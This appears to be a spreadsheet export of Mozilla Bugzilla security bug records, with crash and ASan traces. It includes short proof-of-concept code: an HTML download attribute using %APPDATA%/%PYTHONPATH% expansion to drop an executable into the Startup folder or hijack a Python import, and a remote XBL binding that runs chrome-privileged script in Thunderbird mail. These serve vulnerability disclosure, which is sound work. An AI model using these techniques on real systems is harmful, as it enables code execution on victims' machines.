HTML &lt;a&gt; download attribute accept “%” in the file name, when the file save dialog show up and user click “Save”,  %APPDATA%%HOMEPATH%Microsoft%HOMEPATH%Windows%HOMEPATH%Start Menu%HOMEPATH%Programs%HOMEPATH%Startup%HOMEPATH%poc.exe will be resolved to  C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\poc.exe 
Another attack scenario
User has python installed and “PYTHONPATH” is configured to a path ends with backslash(\). For example: PYTHONPATH=C:\MyPYTHON\. For more details about PYTHONPATH, see link: https://bic-berkeley.github.io/psych-214-fall-2016/using_pythonpath.html
Python imports should be grouped in the following order:
1. sys.modules
2. built-in modules
3. import path: sys.path A list of strings that specifies the search path for modules. Initialized from the environment variable `PYTHONPATH`, plus an installation-dependent default.
So if we put string.py under the %PYTHONPATH% directory, it will hijack the “import string”.
&lt;a id="link" href="/pystr" download="%PYTHONPATH%string.py"&gt;POC&lt;/a&gt;
If user’s PYTHONPATH is configured without endings with backslash, we can still concatenate %HOMEPATH% to attack.
&lt;a id="link" href="/pystr" download="%PYTHONPATH%%HOMEPATH%string.py"&gt;POC&lt;/a&gt;
Actual results:
Website can trick user download file to startup directory, which may cause RCE.
Expected results:
% should be stripped in the file save dialog.</t>
        </is>
      </c>
      <c r="X6093" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6094">
      <c r="A6094" t="n">
        <v>649079</v>
      </c>
      <c r="B6094" t="inlineStr">
        <is>
          <t>2011-04-11 11:59:48 -0700</t>
        </is>
      </c>
      <c r="C6094" t="inlineStr">
        <is>
          <t>firefox crashes when loading npapi plugin OOP and mimetype is set before injection into the dom [@ nsPluginInstanceOwner::GetPluginPortFromWidget ]</t>
        </is>
      </c>
      <c r="D6094" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E6094" t="n">
        <v>1</v>
      </c>
      <c r="F6094" t="n">
        <v>1</v>
      </c>
      <c r="G6094" t="n">
        <v>6</v>
      </c>
      <c r="H6094" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6094" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J6094" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K6094" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L6094" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6094" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6094" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6094" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6094" t="inlineStr">
        <is>
          <t>[sg:high][qa!]</t>
        </is>
      </c>
      <c r="Q6094" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6094" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6094" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T6094" t="n">
        <v>1</v>
      </c>
      <c r="U6094" t="n">
        <v>0</v>
      </c>
      <c r="V6094" t="n">
        <v>19</v>
      </c>
      <c r="W6094" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0) Gecko/20100101 Firefox/4.0
Build Identifier: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0) Gecko/20100101 Firefox/4.0
When I create an object using document.createElement("object") and set the type before appending the element into the DOM, firefox crashes.  If I disable 64 bit ipc the issue goes away.  This issue can be easily reproduced by building FBTestPlugin from the FireBreath master (http://www.firebreath.org) and using the revision of test.html I referenced in the URL field of this bug.
To be clear, it is Firefox that crashes, not the plugin process; it is possible that this is due to something that the plugin is doing, but as it doesn't occur on Safari (32 or 64 bit), Chrome, or Firefox w/out ipc, this seems like a Firefox bug.
Reproducible: Always
Steps to Reproduce:
1. Download FireBreath (ideally using git), install cmake 2.8.4
2. run ./prepmac.sh examples from the firebreath website
3. open buildex/FireBreath.xcodeproj in xcode and build it
4. copy buildex/projects/FBTestPlugin/Debug/FBTestPlugin.plugin to ~/Library/Internet Plugins/
5. download https://github.com/firebreath/FireBreath/raw/master/examples/FBTestPlugin/test.html
5. Open Firefox 4 on Mac OS X 10.6 in 64 bit mode and open test.html
It will crash.
Actual Results:  
It crashes. see https://crash-stats.mozilla.com/report/index/de472a68-35cf-42f7-a1fd-b2a472110411
Crash ID: de472a68-35cf-42f7-a1fd-b2a472110411</t>
        </is>
      </c>
      <c r="X6094" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6095">
      <c r="A6095" t="n">
        <v>1571037</v>
      </c>
      <c r="B6095" t="inlineStr">
        <is>
          <t>2019-08-02 09:48:41 -0700</t>
        </is>
      </c>
      <c r="C6095" t="inlineStr">
        <is>
          <t>heap-use-after-free of BlobBodyStreamHolder</t>
        </is>
      </c>
      <c r="D6095" t="inlineStr">
        <is>
          <t>2020-06-05 00:25:30 -0700</t>
        </is>
      </c>
      <c r="E6095" t="n">
        <v>1</v>
      </c>
      <c r="F6095" t="n">
        <v>1</v>
      </c>
      <c r="G6095" t="n">
        <v>3</v>
      </c>
      <c r="H6095" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6095" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6095" t="inlineStr">
        <is>
          <t>DOM: File</t>
        </is>
      </c>
      <c r="K6095" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6095" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6095" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6095" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6095" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6095" t="inlineStr">
        <is>
          <t>[adv-main70+][adv-main70+r]</t>
        </is>
      </c>
      <c r="Q6095" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6095" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6095" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T6095" t="n">
        <v>1</v>
      </c>
      <c r="U6095" t="n">
        <v>0</v>
      </c>
      <c r="V6095" t="n">
        <v>21</v>
      </c>
      <c r="W6095" t="inlineStr">
        <is>
          <t>Created attachment 9082669
test.zip
STR:
1) unpack test.zip
2) using a fuzzing build, a clean profile and the included prefs.js launch the browser
3) open launcher.html
4) wait 30 - 45 seconds
I can consistently reproduce the issue with a fuzzing ASan build.
Reproduced with m-c:
BuildID=20190731215544
SourceStamp=b0124f06562982dce60b820d95aad23afd5cec90
```
==30998==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030006a0780 at pc 0x7fe298c69f91 bp 0x7ffd8f4de5f0 sp 0x7ffd8f4de5e8
READ of size 8 at 0x6030006a0780 thread T0 (file:// Content)
    #0 0x7fe298c69f90 in CanonicalizeXPCOMParticipant /src/xpcom/base/nsCycleCollector.cpp:848:8
    #1 0x7fe298c69f90 in CCGraphBuilder::NoteXPCOMChild(nsISupports*) /src/xpcom/base/nsCycleCollector.cpp:2155
    #2 0x7fe298c2c374 in mozilla::CycleCollectedJSRuntime::TraverseGCThing(mozilla::CycleCollectedJSRuntime::TraverseSelect, JS::GCCellPtr, nsCycleCollectionTraversalCallback&amp;) /src/xpcom/base/CycleCollectedJSRuntime.cpp:707:5
    #3 0x7fe298c2bee7 in mozilla::JSGCThingParticipant::TraverseNative(void*, nsCycleCollectionTraversalCallback&amp;) /src/xpcom/base/CycleCollectedJSRuntime.cpp:364:12
    #4 0x7fe298c6795a in TraverseNativeAndJS /src/xpcom/base/nsCycleCollectionParticipant.h:126:19
    #5 0x7fe298c6795a in CCGraphBuilder::BuildGraph(js::SliceBudget&amp;) /src/xpcom/base/nsCycleCollector.cpp:2061
    #6 0x7fe298c70154 in nsCycleCollector::MarkRoots(js::SliceBudget&amp;) /src/xpcom/base/nsCycleCollector.cpp:2672:33
    #7 0x7fe298c7706c in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /src/xpcom/base/nsCycleCollector.cpp:3417:9
    #8 0x7fe298c7af04 in nsCycleCollector_collectSlice(js::SliceBudget&amp;, bool) /src/xpcom/base/nsCycleCollector.cpp:3962:21
    #9 0x7fe29d18d851 in nsJSContext::RunCycleCollectorSlice(mozilla::TimeStamp) /src/dom/base/nsJSEnvironment.cpp:1479:3
    #10 0x7fe29d19255c in CCRunnerFired(mozilla::TimeStamp) /src/dom/base/nsJSEnvironment.cpp:1869:7
    #11 0x7fe298df2b60 in operator() /src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/6.4.0/../../../../include/c++/6.4.0/functional:2127:14
    #12 0x7fe298df2b60 in mozilla::IdleTaskRunner::Run() /src/xpcom/threads/IdleTaskRunner.cpp:58
    #13 0x7fe298e31dc0 in nsThread::ProcessNextEvent(bool, bool*) /src/xpcom/threads/nsThread.cpp:1224:14
    #14 0x7fe298e381d8 in NS_ProcessNextEvent(nsIThread*, bool) /src/xpcom/threads/nsThreadUtils.cpp:486:10
    #15 0x7fe29a025baf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /src/ipc/glue/MessagePump.cpp:88:21
    #16 0x7fe299f22c52 in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #17 0x7fe299f22c52 in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #18 0x7fe299f22c52 in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #19 0x7fe2a216df89 in nsBaseAppShell::Run() /src/widget/nsBaseAppShell.cpp:137:27
    #20 0x7fe2a603b55f in XRE_RunAppShell() /src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #21 0x7fe299f22c52 in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #22 0x7fe299f22c52 in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #23 0x7fe299f22c52 in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #24 0x7fe2a603ae06 in XRE_InitChildProcess(int, char**, XREChildData const*) /src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #25 0x55fcea761173 in content_process_main /src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #26 0x55fcea761173 in main /src/browser/app/nsBrowserApp.cpp:267
    #27 0x7fe2ba61cb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #28 0x55fcea6826ac in _start (/home/worker/builds/m-c-20190802094835-fuzzing-asan-opt/firefox+0x456ac)
0x6030006a0780 is located 0 bytes inside of 32-byte region [0x6030006a0780,0x6030006a07a0)
freed by thread T0 (file:// Content) here:
    #0 0x55fcea72dd42 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fe298c90bc2 in MaybeKillObject /src/xpcom/base/nsCycleCollector.cpp:2429:29
    #2 0x7fe298c90bc2 in SnowWhiteKiller::Visit(nsPurpleBuffer&amp;, nsPurpleBufferEntry*) /src/xpcom/base/nsCycleCollector.cpp:2459
    #3 0x7fe298c6e812 in void nsPurpleBuffer::VisitEntries&lt;SnowWhiteKiller&gt;(SnowWhiteKiller&amp;) /src/xpcom/base/nsCycleCollector.cpp:941:23
    #4 0x7fe298c6fa59 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&amp;) /src/xpcom/base/nsCycleCollector.cpp:2624:14
    #5 0x7fe29b139c18 in AsyncFreeSnowWhite::Run() /src/js/xpconnect/src/XPCJSRuntime.cpp:146:9
    #6 0x7fe298e4ca3c in Run /src/xpcom/threads/nsThreadUtils.cpp:331:22
    #7 0x7fe298e4ca3c in IdleRunnableWrapper::TimedOut(nsITimer*, void*) /src/xpcom/threads/nsThreadUtils.cpp:337
    #8 0x7fe298e1f16b in nsTimerImpl::Fire(int) /src/xpcom/threads/nsTimerImpl.cpp:561:7
    #9 0x7fe298e1e9e9 in nsTimerEvent::Run() /src/xpcom/threads/TimerThread.cpp:260:11
    #10 0x7fe298e31dc0 in nsThread::ProcessNextEvent(bool, bool*) /src/xpcom/threads/nsThread.cpp:1224:14
    #11 0x7fe298e381d8 in NS_ProcessNextEvent(nsIThread*, bool) /src/xpcom/threads/nsThreadUtils.cpp:486:10
    #12 0x7fe29a025baf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /src/ipc/glue/MessagePump.cpp:88:21
    #13 0x7fe299f22c52 in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7fe299f22c52 in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #15 0x7fe299f22c52 in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #16 0x7fe2a216df89 in nsBaseAppShell::Run() /src/widget/nsBaseAppShell.cpp:137:27
    #17 0x7fe2a603b55f in XRE_RunAppShell() /src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #18 0x7fe299f22c52 in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #19 0x7fe299f22c52 in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #20 0x7fe299f22c52 in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #21 0x7fe2a603ae06 in XRE_InitChildProcess(int, char**, XREChildData const*) /src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #22 0x55fcea761173 in content_process_main /src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #23 0x55fcea761173 in main /src/browser/app/nsBrowserApp.cpp:267
    #24 0x7fe2ba61cb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
previously allocated by thread T0 (file:// Content) here:
    #0 0x55fcea72e0c3 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x55fcea762e2d in moz_xmalloc /src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fe2a0031301 in operator new /src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7fe2a0031301 in mozilla::dom::Blob::Stream(JSContext*, JS::MutableHandle&lt;JSObject*&gt;, mozilla::ErrorResult&amp;) /src/dom/file/Blob.cpp:362
    #4 0x7fe29d42b951 in mozilla::dom::Blob_Binding::stream(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Blob*, JSJitMethodCallArgs const&amp;) /src/obj-firefox/dom/bindings/BlobBinding.cpp:745:24
    #5 0x7fe29f7bcf2d in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /src/dom/bindings/BindingUtils.cpp:3163:13
    #6 0x7fe2a62f3857 in CallJSNative /src/js/src/vm/Interpreter.cpp:448:13
    #7 0x7fe2a62f3857 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /src/js/src/vm/Interpreter.cpp:540
    #8 0x7fe2a62f6582 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/vm/Interpreter.cpp:611:8
    #9 0x7fe2a6ee477f in js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /src/js/src/proxy/Wrapper.cpp:162:10
    #10 0x7fe2a6e734e1 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /src/js/src/proxy/CrossCompartmentWrapper.cpp:237:19
    #11 0x7fe2a6ec3f6d in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /src/js/src/proxy/Proxy.cpp:504:19
    #12 0x7fe2a62f4a25 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /src/js/src/vm/Interpreter.cpp:514:14
    #13 0x7fe2a62dc113 in CallFromStack /src/js/src/vm/Interpreter.cpp:599:10
    #14 0x7fe2a62dc113 in Interpret(JSContext*, js::RunState&amp;) /src/js/src/vm/Interpreter.cpp:3084
    #15 0x7fe2a62bdd7f in js::RunScript(JSContext*, js::RunState&amp;) /src/js/src/vm/Interpreter.cpp:425:10
    #16 0x7fe2a62fa11f in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /src/js/src/vm/Interpreter.cpp:787:13
    #17 0x7fe2a63e4789 in EvalKernel(JSContext*, JS::Handle&lt;JS::Value&gt;, EvalType, js::AbstractFramePtr, JS::Handle&lt;JSObject*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/builtin/Eval.cpp:335:10
    #18 0x7fe2a63e68eb in js::DirectEval(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/builtin/Eval.cpp:449:10
    #19 0x7fe2a75a8d28 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/jit/BaselineIC.cpp:3196:10
    #20 0x201f0bca0797  (&lt;unknown module&gt;)
    #21 0x6250005328cf  (&lt;unknown module&gt;)
    #22 0x201f0bcb7bf6  (&lt;unknown module&gt;)
SUMMARY: AddressSanitizer: heap-use-after-free /src/xpcom/base/nsCycleCollector.cpp:848:8 in CanonicalizeXPCOMParticipant
Shadow bytes around the buggy address:
  0x0c06800cc0a0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
  0x0c06800cc0b0: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa
  0x0c06800cc0c0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fa
  0x0c06800cc0d0: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd
  0x0c06800cc0e0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
=&gt;0x0c06800cc0f0:[fd]fd fd fd fa fa 00 00 05 fa fa fa fd fd fd fa
  0x0c06800cc100: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd
  0x0c06800cc110: fd fa fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x0c06800cc120: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fd
  0x0c06800cc130: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
  0x0c06800cc140: fd fd fa fa fd fd fd fa fa fa fd fd fd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30998==ABORTING
```</t>
        </is>
      </c>
      <c r="X6095" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6096">
      <c r="A6096" t="n">
        <v>292591</v>
      </c>
      <c r="B6096" t="inlineStr">
        <is>
          <t>2005-05-02 02:37:02 -0700</t>
        </is>
      </c>
      <c r="C6096" t="inlineStr">
        <is>
          <t>content XBL scripts run even when Javascript turned off (Thunderbird exposed to any JS exploit)</t>
        </is>
      </c>
      <c r="D6096" t="inlineStr">
        <is>
          <t>2011-08-05 22:33:03 -0700</t>
        </is>
      </c>
      <c r="E6096" t="n">
        <v>1</v>
      </c>
      <c r="F6096" t="n">
        <v>1</v>
      </c>
      <c r="G6096" t="n">
        <v>3</v>
      </c>
      <c r="H6096" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6096" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6096" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K6096" t="inlineStr">
        <is>
          <t>1.7 Branch</t>
        </is>
      </c>
      <c r="L6096" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6096" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6096" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6096" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6096" t="inlineStr">
        <is>
          <t>[sg:fix] have patch</t>
        </is>
      </c>
      <c r="Q6096" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6096" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6096" t="inlineStr">
        <is>
          <t>mozilla1.8beta3</t>
        </is>
      </c>
      <c r="T6096" t="n">
        <v>1</v>
      </c>
      <c r="U6096" t="n">
        <v>0</v>
      </c>
      <c r="V6096" t="n">
        <v>29</v>
      </c>
      <c r="W6096" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Thunderbird/1.0.2
1) Disabling JavaScript doesn't stop the XBL version of bug 289074
   and bug 289083. (bug 289074 comment 89)
2) Thunderbird doesn't block remote XBL, even though "Block loading of
   remote images" setting is true. (bug 292589)
thus, Thunderbird is exploitable *by default*.
Affected:
(Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Thunderbird/1.0.2
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050501 Thunderbird/1.0+
Not Affected:
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050501 Thunderbird/1.0.4
Reproducible: Always
Steps to Reproduce:
create the following HTML mail, and receive it, and open it.
&lt;body&gt;
&lt;p&gt;If the remote XBL is loaded, a red box appears below.&lt;/p&gt;
&lt;p
style="-moz-binding:url(http://members.tripod.com/cv6y-mlr8-9hh/sgh7-ry6s/test-ex.xml#x);"&gt;&lt;/p&gt;
&lt;/body&gt;
-----
http://members.tripod.com/cv6y-mlr8-9hh/sgh7-ry6s/test-ex.xml is:
&lt;?xml version="1.0"?&gt;
&lt;bindings xmlns="http://www.mozilla.org/xbl"
          xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"&gt;
  &lt;binding id="x"&gt;
    &lt;content&gt;
      &lt;xul:vbox style="border: solid 2px #f00;"&gt;
        &lt;xul:label value="This is the remote XBL content."/&gt;
        &lt;xul:label value="Left-click or Right-click or Middle-click on me."/&gt;
      &lt;/xul:vbox&gt;
    &lt;/content&gt;
    &lt;implementation&gt;
      &lt;property name="localName"&gt;
        &lt;getter&gt;
          &lt;![CDATA[
            // it needs chrome privilege to get |Components.stack|
            var code = "alert('Exploit!\\n\\n' + Components.stack);'p';";
            var s = new String("P");
            s.toLowerCase = new Script(code);
            return s;
          ]]&gt;
        &lt;/getter&gt;
      &lt;/property&gt;
    &lt;/implementation&gt;
  &lt;/binding&gt;
&lt;/bindings&gt;</t>
        </is>
      </c>
      <c r="X6096" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6097">
      <c r="A6097" t="n">
        <v>946658</v>
      </c>
      <c r="B6097" t="inlineStr">
        <is>
          <t>2013-12-05 03:54:41 -0800</t>
        </is>
      </c>
      <c r="C6097" t="inlineStr">
        <is>
          <t>Intermittent browser_dbg_variables-view-popup-07.js | [@ nsView::DoResetWidgetBounds(bool, bool)] or [@ nsViewManager::ProcessPendingUpdatesForView(nsView*, bool)]</t>
        </is>
      </c>
      <c r="D6097" t="inlineStr">
        <is>
          <t>2018-08-29 15:24:07 -0700</t>
        </is>
      </c>
      <c r="E6097" t="n">
        <v>1</v>
      </c>
      <c r="F6097" t="n">
        <v>1</v>
      </c>
      <c r="G6097" t="n">
        <v>3</v>
      </c>
      <c r="H6097" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6097" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6097" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K6097" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6097" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6097" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6097" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6097" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6097" t="inlineStr">
        <is>
          <t>[adv-main29+]</t>
        </is>
      </c>
      <c r="Q6097" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6097" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6097" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T6097" t="n">
        <v>1</v>
      </c>
      <c r="U6097" t="n">
        <v>0</v>
      </c>
      <c r="V6097" t="n">
        <v>57</v>
      </c>
      <c r="W6097" t="inlineStr">
        <is>
          <t>Rev5 MacOSX Mountain Lion 10.8 fx-team debug test mochitest-browser-chrome on 2013-12-04 19:55:34 PST for push bf901d895201
slave: talos-mtnlion-r5-061
https://tbpl.mozilla.org/php/getParsedLog.php?id=31472407&amp;tree=Fx-Team
Summary
TEST-UNEXPECTED-FAIL | chrome://mochitests/content/browser/browser/devtools/debugger/test/browser_dbg_variables-view-popup-07.js | application terminated with exit code 256
PROCESS-CRASH | chrome://mochitests/content/browser/browser/devtools/debugger/test/browser_dbg_variables-view-popup-07.js | application crashed [@ nsView::DoResetWidgetBounds(bool, bool)]
also leaked 
TEST-UNEXPECTED-FAIL | leakcheck | 2968 bytes leaked (CompositorChild, CondVar, Mutex, PCompositorChild, PLayerTransactionChild, ...) but not sure if this belongs to the tracking bugs
20:36:06  WARNING -  PROCESS-CRASH | chrome://mochitests/content/browser/browser/devtools/debugger/test/browser_dbg_variables-view-popup-07.js | application crashed [@ nsView::DoResetWidgetBounds(bool, bool)]
20:36:06     INFO -  Crash dump filename: /var/folders/22/cg9zv2f53yd1fn8byjsck83r00000w/T/tmp0zxQG7/minidumps/DA3C4403-9249-4042-930A-83DE146F429D.dmp
20:36:06     INFO -  Operating system: Mac OS X
20:36:06     INFO -                    10.8.0 12A269
20:36:06     INFO -  CPU: amd64
20:36:06     INFO -       family 6 model 42 stepping 7
20:36:06     INFO -       8 CPUs
20:36:06     INFO -  Crash reason:  EXC_BAD_ACCESS / 0x0000000d
20:36:06     INFO -  Crash address: 0x0
20:36:06     INFO -  Thread 0 (crashed)
20:36:06     INFO -   0  XUL!nsView::DoResetWidgetBounds(bool, bool) [nsViewManager.h:bf901d895201 : 63 + 0x0]
20:36:06     INFO -      rbx = 0x000000018883bac0   r12 = 0x0000000112632760
20:36:06     INFO -      r13 = 0x0000000000000000   r14 = 0x000000018883bac0
20:36:06     INFO -      r15 = 0x0000000000000000   rip = 0x00000001027038e1
20:36:06     INFO -      rsp = 0x00007fff5fbe1e30   rbp = 0x00007fff5fbe1ed0
20:36:06     INFO -      Found by: given as instruction pointer in context
20:36:06     INFO -   1  XUL!nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) [nsViewManager.cpp:bf901d895201 : 383 + 0xe]
20:36:06     INFO -      rbx = 0x000000018883bac0   r12 = 0x0000000112632760
20:36:06     INFO -      r13 = 0x0000000000000000   r14 = 0x000000018883bac0
20:36:06     INFO -      r15 = 0x0000000000000000   rip = 0x000000010270717c
20:36:06     INFO -      rsp = 0x00007fff5fbe1ee0   rbp = 0x00007fff5fbe1f30
20:36:06     INFO -      Found by: call frame info
20:36:06     INFO -   2  XUL!nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) [nsViewManager.cpp:bf901d895201 : 389 + 0x18]
20:36:06     INFO -      rbx = 0x000000018883bac0   r12 = 0x0000000112632760
20:36:06     INFO -      r13 = 0x0000000000000000   r14 = 0x000000015dc3af00
20:36:06     INFO -      r15 = 0x0000000000000000   rip = 0x000000010270719e
20:36:06     INFO -      rsp = 0x00007fff5fbe1f40   rbp = 0x00007fff5fbe1f90
20:36:06     INFO -      Found by: call frame info
20:36:06     INFO -   3  XUL!nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) [nsViewManager.cpp:bf901d895201 : 389 + 0x18]
20:36:06     INFO -      rbx = 0x000000015dc3af00   r12 = 0x0000000112632760
20:36:06     INFO -      r13 = 0x0000000000000000   r14 = 0x000000016297fae0
20:36:06     INFO -      r15 = 0x0000000000000000   rip = 0x000000010270719e
20:36:06     INFO -      rsp = 0x00007fff5fbe1fa0   rbp = 0x00007fff5fbe1ff0
20:36:06     INFO -      Found by: call frame info
20:36:06     INFO -   4  XUL!nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) [nsViewManager.cpp:bf901d895201 : 389 + 0x18]
20:36:06     INFO -      rbx = 0x000000016297fae0   r12 = 0x0000000112632760
20:36:06     INFO -      r13 = 0x0000000000000000   r14 = 0x0000000166119790
20:36:06     INFO -      r15 = 0x0000000000000000   rip = 0x000000010270719e
20:36:06     INFO -      rsp = 0x00007fff5fbe2000   rbp = 0x00007fff5fbe2050
20:36:06     INFO -      Found by: call frame info</t>
        </is>
      </c>
      <c r="X6097" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6098">
      <c r="A6098" t="n">
        <v>461861</v>
      </c>
